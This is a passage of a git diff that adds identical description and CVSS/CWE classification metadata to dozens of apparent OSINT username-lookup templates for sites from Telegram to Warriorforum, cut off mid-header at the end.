-3,7 +3,12 @@ id: telegram info: name: Telegram author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,telegram self-contained: true diff --git a/osint/tellonym.yaml b/osint/tellonym.yaml index 56bb8757ba..599b845ead 100644 --- a/osint/tellonym.yaml +++ b/osint/tellonym.yaml @@ -3,7 +3,12 @@ id: tellonym info: name: Tellonym author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,tellonym self-contained: true diff --git a/osint/tenor.yaml b/osint/tenor.yaml index d5c01f2422..8f37c86d32 100644 --- a/osint/tenor.yaml +++ b/osint/tenor.yaml @@ -3,7 +3,12 @@ id: tenor info: name: Tenor author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,tenor self-contained: true diff --git a/osint/tf2-backpack-examiner.yaml b/osint/tf2-backpack-examiner.yaml index d75b6ba7a7..b83b6e8fb1 100644 --- a/osint/tf2-backpack-examiner.yaml +++ b/osint/tf2-backpack-examiner.yaml @@ -3,7 +3,12 @@ id: tf2-backpack-examiner info: name: TF2 Backpack Examiner author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,tf2-backpack-examiner self-contained: true diff --git a/osint/thegatewaypundit.yaml b/osint/thegatewaypundit.yaml index c60bab05b1..7e61442b16 100644 --- a/osint/thegatewaypundit.yaml +++ b/osint/thegatewaypundit.yaml @@ -3,7 +3,12 @@ id: thegatewaypundit info: name: thegatewaypundit author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-political,thegatewaypundit self-contained: true diff --git a/osint/theguardian.yaml b/osint/theguardian.yaml index e10390af0a..727833d530 100644 --- a/osint/theguardian.yaml +++ b/osint/theguardian.yaml @@ -3,7 +3,12 @@ id: theguardian info: name: theguardian author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-news,theguardian self-contained: true diff --git a/osint/themeforest.yaml b/osint/themeforest.yaml index e83566b0be..84ece9b735 100644 --- a/osint/themeforest.yaml +++ b/osint/themeforest.yaml @@ -3,7 +3,12 @@ id: themeforest info: name: themeforest author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,themeforest self-contained: true diff --git a/osint/thetattooforum.yaml b/osint/thetattooforum.yaml index 1f9ecf1164..4514482fb9 100644 --- a/osint/thetattooforum.yaml +++ b/osint/thetattooforum.yaml @@ -3,7 +3,12 @@ id: thetattooforum info: name: Thetattooforum author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,thetattooforum self-contained: true diff --git a/osint/tiktok.yaml b/osint/tiktok.yaml index 299698dc28..fe7d740ad0 100644 --- a/osint/tiktok.yaml +++ b/osint/tiktok.yaml @@ -3,7 +3,12 @@ id: tiktok info: name: TikTok author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,tiktok self-contained: true diff --git a/osint/tildezone-mastodon-instance.yaml b/osint/tildezone-mastodon-instance.yaml index 4edef56fb7..7ab2c35d71 100644 --- a/osint/tildezone-mastodon-instance.yaml +++ b/osint/tildezone-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: tildezone-mastodon-instance info: name: Tilde.zone (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,tildezone-mastodon-instance self-contained: true diff --git a/osint/tinder.yaml b/osint/tinder.yaml index 9a089f3867..f84f126204 100644 --- a/osint/tinder.yaml +++ b/osint/tinder.yaml @@ -3,7 +3,12 @@ id: tinder info: name: Tinder author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-dating,tinder self-contained: true diff --git a/osint/tootingch-mastodon-instance.yaml b/osint/tootingch-mastodon-instance.yaml index 04708047e9..6f7affb1cb 100644 --- a/osint/tootingch-mastodon-instance.yaml +++ b/osint/tootingch-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: tootingch-mastodon-instance info: name: Tooting.ch (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,tootingch-mastodon-instance self-contained: true diff --git a/osint/totalwar.yaml b/osint/totalwar.yaml index 50f20c3587..7d522ba201 100644 --- a/osint/totalwar.yaml +++ b/osint/totalwar.yaml @@ -3,7 +3,12 @@ id: totalwar info: name: TotalWar author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,totalwar self-contained: true diff --git a/osint/toyhouse.yaml b/osint/toyhouse.yaml index 394140855d..db497760d5 100644 --- a/osint/toyhouse.yaml +++ b/osint/toyhouse.yaml @@ -3,7 +3,12 @@ id: toyhouse info: name: toyhou.se author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,toyhouse self-contained: true diff --git a/osint/trackmanialadder.yaml b/osint/trackmanialadder.yaml index 2d4f731c36..8a1b158106 100644 --- a/osint/trackmanialadder.yaml +++ b/osint/trackmanialadder.yaml @@ -3,7 +3,12 @@ id: trackmanialadder info: name: TrackmaniaLadder author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,trackmanialadder self-contained: true diff --git a/osint/tradingview.yaml b/osint/tradingview.yaml index 86610bbfbb..4a49d8b403 100644 --- a/osint/tradingview.yaml +++ b/osint/tradingview.yaml @@ -3,7 +3,12 @@ id: tradingview info: name: tradingview author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,tradingview self-contained: true diff --git a/osint/trakt.yaml b/osint/trakt.yaml index 90002f71b0..9d3ce08437 100644 --- a/osint/trakt.yaml +++ b/osint/trakt.yaml @@ -3,7 +3,12 @@ id: trakt info: name: trakt author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,trakt self-contained: true diff --git a/osint/trello.yaml b/osint/trello.yaml index 1d26cf5707..11f83b92f0 100644 --- a/osint/trello.yaml +++ b/osint/trello.yaml @@ -3,7 +3,12 @@ id: trello info: name: Trello author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,trello self-contained: true diff --git a/osint/tripadvisor.yaml b/osint/tripadvisor.yaml index 66a0736d59..0b9d999ae8 100644 --- a/osint/tripadvisor.yaml +++ b/osint/tripadvisor.yaml @@ -3,7 +3,12 @@ id: tripadvisor info: name: tripadvisor author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,tripadvisor self-contained: true diff --git a/osint/truth-social.yaml b/osint/truth-social.yaml index 4446d0a785..41d5edfe41 100644 --- a/osint/truth-social.yaml +++ b/osint/truth-social.yaml @@ -3,7 +3,12 @@ id: truth-social info: name: Truth Social author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,truth-social self-contained: true diff --git a/osint/tumblr.yaml b/osint/tumblr.yaml index 5ae453294c..8f58d74d82 100644 --- a/osint/tumblr.yaml +++ b/osint/tumblr.yaml @@ -3,7 +3,12 @@ id: tumblr info: name: tumblr author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,tumblr self-contained: true diff --git a/osint/tunefind.yaml b/osint/tunefind.yaml index 87d5a56f3b..66336cc3c4 100644 --- a/osint/tunefind.yaml +++ b/osint/tunefind.yaml @@ -3,7 +3,12 @@ id: tunefind info: name: Tunefind author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,tunefind self-contained: true diff --git a/osint/twitcasting.yaml b/osint/twitcasting.yaml index cfd77865a2..1469773e8a 100644 --- a/osint/twitcasting.yaml +++ b/osint/twitcasting.yaml @@ -3,7 +3,12 @@ id: twitcasting info: name: Twitcasting author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,twitcasting self-contained: true diff --git a/osint/twitch.yaml b/osint/twitch.yaml index 7e2abcaf32..92e43d7649 100644 --- a/osint/twitch.yaml +++ b/osint/twitch.yaml @@ -3,7 +3,12 @@ id: twitch info: name: Twitch author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,twitch self-contained: true diff --git a/osint/twitter-archived-profile.yaml b/osint/twitter-archived-profile.yaml index 55f9f94ec4..6c74b42e69 100644 --- a/osint/twitter-archived-profile.yaml +++ b/osint/twitter-archived-profile.yaml @@ -3,7 +3,12 @@ id: twitter-archived-profile info: name: Twitter archived profile author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-archived,twitter-archived-profile self-contained: true diff --git a/osint/twitter-archived-tweets.yaml b/osint/twitter-archived-tweets.yaml index f204adb668..3955b200ed 100644 --- a/osint/twitter-archived-tweets.yaml +++ b/osint/twitter-archived-tweets.yaml @@ -3,7 +3,12 @@ id: twitter-archived-tweets info: name: Twitter archived tweets author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-archived,twitter-archived-tweets self-contained: true diff --git a/osint/twitter.yaml b/osint/twitter.yaml index cab041afc8..3296302e26 100644 --- a/osint/twitter.yaml +++ b/osint/twitter.yaml @@ -3,7 +3,12 @@ id: twitter info: name: Twitter author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,twitter self-contained: true diff --git a/osint/twpro.yaml b/osint/twpro.yaml index 7caff7bfe3..ffddd88bd3 100644 --- a/osint/twpro.yaml +++ b/osint/twpro.yaml @@ -3,7 +3,12 @@ id: twpro info: name: twpro author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,twpro self-contained: true diff --git a/osint/ubisoft.yaml b/osint/ubisoft.yaml index 0b261f15e6..ed493305e8 100644 --- a/osint/ubisoft.yaml +++ b/osint/ubisoft.yaml @@ -3,7 +3,12 @@ id: ubisoft info: name: Ubisoft author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,ubisoft self-contained: true diff --git a/osint/udemy.yaml b/osint/udemy.yaml index aab110263b..a6e310a95e 100644 --- a/osint/udemy.yaml +++ b/osint/udemy.yaml @@ -3,7 +3,12 @@ id: udemy info: name: Udemy author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,udemy self-contained: true diff --git a/osint/uefconnect.yaml b/osint/uefconnect.yaml index da6c04aa29..8ac8314a22 100644 --- a/osint/uefconnect.yaml +++ b/osint/uefconnect.yaml @@ -3,7 +3,12 @@ id: uefconnect info: name: uefconnect author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,uefconnect self-contained: true diff --git a/osint/uid.yaml b/osint/uid.yaml index bc68ac6997..00ff42ae87 100644 --- a/osint/uid.yaml +++ b/osint/uid.yaml @@ -3,7 +3,12 @@ id: uid info: name: uid author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,uid self-contained: true diff --git a/osint/uiuxdevsocial-mastodon-instance.yaml b/osint/uiuxdevsocial-mastodon-instance.yaml index 822e24d6db..5958b3180b 100644 --- a/osint/uiuxdevsocial-mastodon-instance.yaml +++ b/osint/uiuxdevsocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: uiuxdevsocial-mastodon-instance info: name: Uiuxdev.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,uiuxdevsocial-mastodon-instance self-contained: true diff --git a/osint/ultras-diary.yaml b/osint/ultras-diary.yaml index 2e74181adc..9c7107c215 100644 --- a/osint/ultras-diary.yaml +++ b/osint/ultras-diary.yaml @@ -3,7 +3,12 @@ id: ultras-diary info: name: Ultras Diary author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,ultras-diary self-contained: true diff --git a/osint/ulubpl.yaml b/osint/ulubpl.yaml index 656e5d1d3b..01babca020 100644 --- a/osint/ulubpl.yaml +++ b/osint/ulubpl.yaml @@ -3,7 +3,12 @@ id: ulubpl info: name: ulub.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,ulubpl self-contained: true diff --git a/osint/unsplash.yaml b/osint/unsplash.yaml index bab3d93c2c..87f01a80be 100644 --- a/osint/unsplash.yaml +++ b/osint/unsplash.yaml @@ -3,7 +3,12 @@ id: unsplash info: name: unsplash author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,unsplash self-contained: true diff --git a/osint/untappd.yaml b/osint/untappd.yaml index fd93b49f9c..9f4fb28789 100644 --- a/osint/untappd.yaml +++ b/osint/untappd.yaml @@ -3,7 +3,12 @@ id: untappd info: name: untappd author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,untappd self-contained: true diff --git a/osint/usa-life.yaml b/osint/usa-life.yaml index fb24e3955d..35a792cc12 100644 --- a/osint/usa-life.yaml +++ b/osint/usa-life.yaml @@ -3,7 +3,12 @@ id: usa-life info: name: USA Life author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,usa-life self-contained: true diff --git a/osint/utipio.yaml b/osint/utipio.yaml index 7704c26fd0..8b32085d08 100644 --- a/osint/utipio.yaml +++ b/osint/utipio.yaml @@ -3,7 +3,12 @@ id: utipio info: name: utip.io author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,utipio self-contained: true diff --git a/osint/uwuai.yaml b/osint/uwuai.yaml index edfc50c485..31256fef22 100644 --- a/osint/uwuai.yaml +++ b/osint/uwuai.yaml @@ -3,7 +3,12 @@ id: uwuai info: name: uwu.ai author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,uwuai self-contained: true diff --git a/osint/uwumarket.yaml b/osint/uwumarket.yaml index ed13039874..2669cd9c75 100644 --- a/osint/uwumarket.yaml +++ b/osint/uwumarket.yaml @@ -3,7 +3,12 @@ id: uwumarket info: name: Uwumarket author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,uwumarket self-contained: true diff --git a/osint/venmo.yaml b/osint/venmo.yaml index 48c9e385bd..976815287b 100644 --- a/osint/venmo.yaml +++ b/osint/venmo.yaml @@ -3,7 +3,12 @@ id: venmo info: name: Venmo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,venmo self-contained: true diff --git a/osint/vero.yaml b/osint/vero.yaml index e63db7ac85..75edfbca47 100644 --- a/osint/vero.yaml +++ b/osint/vero.yaml @@ -3,7 +3,12 @@ id: vero info: name: Vero author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,vero self-contained: true diff --git a/osint/vibilagare.yaml b/osint/vibilagare.yaml index eb1127a856..fd464b33d3 100644 --- a/osint/vibilagare.yaml +++ b/osint/vibilagare.yaml @@ -3,7 +3,12 @@ id: vibilagare info: name: vibilagare author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,vibilagare self-contained: true diff --git a/osint/viddler.yaml b/osint/viddler.yaml index 084aebe77c..691debfaca 100644 --- a/osint/viddler.yaml +++ b/osint/viddler.yaml @@ -3,7 +3,12 @@ id: viddler info: name: viddler author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,viddler self-contained: true diff --git a/osint/vimeo.yaml b/osint/vimeo.yaml index 12f04fd0d5..6ca2de4bea 100644 --- a/osint/vimeo.yaml +++ b/osint/vimeo.yaml @@ -3,7 +3,12 @@ id: vimeo info: name: Vimeo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,vimeo self-contained: true diff --git a/osint/vine.yaml b/osint/vine.yaml index 09d0cd9586..a3fa40191f 100644 --- a/osint/vine.yaml +++ b/osint/vine.yaml @@ -3,7 +3,12 @@ id: vine info: name: Vine author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,vine self-contained: true diff --git a/osint/vip-blog.yaml b/osint/vip-blog.yaml index 60d79c930d..34619bf7c0 100644 --- a/osint/vip-blog.yaml +++ b/osint/vip-blog.yaml @@ -3,7 +3,12 @@ id: vip-blog info: name: VIP-blog author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,vip-blog self-contained: true diff --git a/osint/virustotal.yaml b/osint/virustotal.yaml index b78df97d17..9181056830 100644 --- a/osint/virustotal.yaml +++ b/osint/virustotal.yaml @@ -3,7 +3,12 @@ id: virustotal info: name: Virustotal author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,virustotal self-contained: true diff --git a/osint/visnesscard.yaml b/osint/visnesscard.yaml index 9a1b11c1ca..43bc796831 100644 --- a/osint/visnesscard.yaml +++ b/osint/visnesscard.yaml @@ -3,7 +3,12 @@ id: visnesscard info: name: visnesscard author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,visnesscard self-contained: true diff --git a/osint/vivino.yaml b/osint/vivino.yaml index 609897b0e1..8a2ac5e5c2 100644 --- a/osint/vivino.yaml +++ b/osint/vivino.yaml @@ -3,7 +3,12 @@ id: vivino info: name: Vivino author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,vivino self-contained: true diff --git a/osint/vk.yaml b/osint/vk.yaml index 981771003a..c5330a1151 100644 --- a/osint/vk.yaml +++ b/osint/vk.yaml @@ -3,7 +3,12 @@ id: vk info: name: VK author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,vk self-contained: true diff --git a/osint/vklworld-mastodon-instance.yaml b/osint/vklworld-mastodon-instance.yaml index 9c722a3712..bd12c9364e 100644 --- a/osint/vklworld-mastodon-instance.yaml +++ b/osint/vklworld-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: vklworld-mastodon-instance info: name: Vkl.world (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,vklworld-mastodon-instance self-contained: true diff --git a/osint/vmstio-mastodon-instance.yaml b/osint/vmstio-mastodon-instance.yaml index ea2cb9052d..4efe4d0d0e 100644 --- a/osint/vmstio-mastodon-instance.yaml +++ b/osint/vmstio-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: vmstio-mastodon-instance info: name: Vmst.io (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,vmstio-mastodon-instance self-contained: true diff --git a/osint/voice123.yaml b/osint/voice123.yaml index 3e9df3da97..750dbdc9e6 100644 --- a/osint/voice123.yaml +++ b/osint/voice123.yaml @@ -3,7 +3,12 @@ id: voice123 info: name: Voice123 author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,voice123 self-contained: true diff --git a/osint/voicescom.yaml b/osint/voicescom.yaml index 4c009f2627..693fbaa39c 100644 --- a/osint/voicescom.yaml +++ b/osint/voicescom.yaml @@ -3,7 +3,12 @@ id: voicescom info: name: Voices.com author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,voicescom self-contained: true diff --git a/osint/vsco.yaml b/osint/vsco.yaml index e33ddb8de6..d2d52bbbac 100644 --- a/osint/vsco.yaml +++ b/osint/vsco.yaml @@ -3,7 +3,12 @@ id: vsco info: name: vsco author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,vsco self-contained: true diff --git a/osint/wanelo.yaml b/osint/wanelo.yaml index 7fd2b12631..a643878aca 100644 --- a/osint/wanelo.yaml +++ b/osint/wanelo.yaml @@ -3,7 +3,12 @@ id: wanelo info: name: Wanelo author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,wanelo self-contained: true diff --git a/osint/warriorforum.yaml b/osint/warriorforum.yaml index 88b924c660..fdd360bf77 100644 --- a/osint/warriorforum.yaml +++ b/osint/warriorforum.yaml @@ -3,7 +3,12 @@ id: warriorforum info: name: warriorforum author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,warriorforum self-contained: true diff --git a/osint/watchmemorecom.yaml b/osint/watchmemorecom.yaml index 3b1cf719d8..3273bb30be 100644 --- 